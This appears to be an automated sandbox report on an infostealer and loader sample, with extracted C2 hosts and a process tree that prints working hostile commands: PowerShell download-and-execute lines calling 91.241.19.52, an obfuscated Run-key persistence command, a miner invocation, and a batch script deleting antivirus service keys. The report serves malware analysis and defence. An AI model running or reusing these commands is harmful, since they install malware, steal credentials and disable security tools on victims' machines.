Overview

overview

10

Static

static

92b685aedd...24.exe

windows7_x64

10

92b685aedd...24.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    12-08-2021 04:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    92b685aedd90d350504624e142c53b24.exe

  • Size

    319KB

  • MD5

    92b685aedd90d350504624e142c53b24

  • SHA1

    ab0db0c63accdd0d6b83f995d302b5885c60d9ad

  • SHA256

    e0be41471fb0457c80e1c8a10efc91c223183838ecadbddd200376cfd9c2721a

  • SHA512

    2fabf92a35a53810c576d06f710659b268f660e81be072dc133a786c1d669d161d6007d6e13b710a7170db6fb9333f2903991b479818c3eac9cef00c4e181dbe

Score
10/10
raccoonredlinesmokeloader2ca2376c561d1af7f8b9e6f3256b06220a3db187471c70de3b4f9e4d493e418d1f60a90659057de0@gasfer_darkcd8dc1031358b1aec55cc6bc447df1018b068607backdoordiscoveryevasioninfostealerpersistencespywarestealersuricatathemidatrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.241.19.52/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/
rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

2ca2376c561d1af7f8b9e6f3256b06220a3db187

Attributes
  • url4cnc

    https://telete.in/johnyes13

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

@gasfer_dark

C2

207.154.240.76:80

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes
  • url4cnc

    https://telete.in/p1rosto100xx

rc4.plain
rc4.plain

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • Raccoon Stealer Payload 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 64 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 5 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 49 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\92b685aedd90d350504624e142c53b24.exe
    "C:\Users\Admin\AppData\Local\Temp\92b685aedd90d350504624e142c53b24.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2016
    • C:\Users\Admin\AppData\Local\Temp\92b685aedd90d350504624e142c53b24.exe
      "C:\Users\Admin\AppData\Local\Temp\92b685aedd90d350504624e142c53b24.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2884
  • C:\Users\Admin\AppData\Local\Temp\BCCE.exe
    C:\Users\Admin\AppData\Local\Temp\BCCE.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:2296
    • C:\Users\Admin\AppData\Local\Temp\is-VC816.tmp\BCCE.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-VC816.tmp\BCCE.tmp" /SL5="$6005C,4193427,831488,C:\Users\Admin\AppData\Local\Temp\BCCE.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1460
      • C:\Users\Admin\AppData\Local\Temp\BCCE.exe
        "C:\Users\Admin\AppData\Local\Temp\BCCE.exe" /VERYSILENT
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2208
        • C:\Users\Admin\AppData\Local\Temp\is-4CV6T.tmp\BCCE.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-4CV6T.tmp\BCCE.tmp" /SL5="$60058,4193427,831488,C:\Users\Admin\AppData\Local\Temp\BCCE.exe" /VERYSILENT
          4⤵
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:684
          • C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
            "C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Modifies system certificate store
            PID:3864
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4592
            • C:\ProgramData\Data\install.exe
              "C:\ProgramData\Data\install.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:4652
              • C:\ProgramData\Data\install.exe
                "C:\ProgramData\Data\install.exe"
                7⤵
                • Executes dropped EXE
                PID:3952
              • C:\ProgramData\Data\install.exe
                "C:\ProgramData\Data\install.exe"
                7⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Drops file in Windows directory
                • Modifies registry class
                PID:1636
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XRAnpEIiD2.bat"
                  8⤵
                    PID:4936
                    • C:\Windows\SysWOW64\chcp.com
                      chcp 65001
                      9⤵
                        PID:5016
                      • C:\Windows\SysWOW64\w32tm.exe
                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        9⤵
                          PID:5040
                          • C:\Windows\System32\w32tm.exe
                            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            10⤵
                              PID:5056
                          • C:\Windows\twain_32\explorer.exe
                            "C:\Windows\twain_32\explorer.exe"
                            9⤵
                            • Executes dropped EXE
                            PID:2268
                    • C:\ProgramData\Systemd\HostData.exe
                      NULL
                      6⤵
                      • Executes dropped EXE
                      PID:4680
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4700
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4792
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4864
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4980
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:5072
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:5108
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4168
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4228
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4100
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4176
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:2408
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4312
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:1348
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:3756
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:2960
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4424
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:2764
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4480
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:3860
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4476
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:2868
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:848
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:2752
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:4552
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:3924
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:4580
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:1240
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:4752
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:4964
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:4980
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:5112
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:3472
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:4224
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      PID:4228
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:4172
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:2788
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:3680
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:2328
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:4268
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:1108
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      PID:4428
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:3888
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:3732
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:1304
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:800
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:4420
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:3092
          • C:\Users\Admin\AppData\Local\Temp\C858.exe
            C:\Users\Admin\AppData\Local\Temp\C858.exe
            1⤵
            • Executes dropped EXE
            • Checks BIOS information in registry
            • Checks whether UAC is enabled
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            PID:1160
          • C:\Users\Admin\AppData\Local\Temp\CCDD.exe
            C:\Users\Admin\AppData\Local\Temp\CCDD.exe
            1⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4000
            • C:\ProgramData\Runtimebroker.exe
              "C:\ProgramData\Runtimebroker.exe"
              2⤵
              • Executes dropped EXE
              • Drops startup file
              • Suspicious use of WriteProcessMemory
              PID:3776
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
                3⤵
                • Adds Run key to start application
                • Suspicious use of AdjustPrivilegeToken
                PID:3296
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
                3⤵
                • Blocklisted process makes network request
                PID:2464
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" Get-MpPreference -verbose
                  4⤵
                    PID:2240
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d 